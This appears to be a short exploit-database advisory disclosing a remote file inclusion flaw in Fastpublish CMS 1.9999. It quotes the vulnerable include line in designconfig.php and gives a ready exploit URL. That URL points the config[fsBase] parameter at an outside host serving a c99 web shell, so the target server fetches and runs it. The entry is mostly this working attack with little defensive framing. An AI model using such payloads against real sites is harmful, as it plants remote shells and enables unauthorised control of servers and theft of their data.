id: 2358
date: 12/12/2007
title: Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability
author: RoMaNcYxHaCkEr
cves: 

=======================================================
Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability
=======================================================



# Name : Fastpublish CMS 1.9999 (config[fsBase]) Remote File Include
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulne Code In designconfig.php In Line 25 :
@include($config['fsBase']
# Exploit :
www.RxH.com/fastpublish_19999d_trial/adminbereich/designconfig.php?config[fsBase]=http://www.no-hack.fr/shells/c99.txt?

============================================================================



#  0day.today [2023-03-25]  #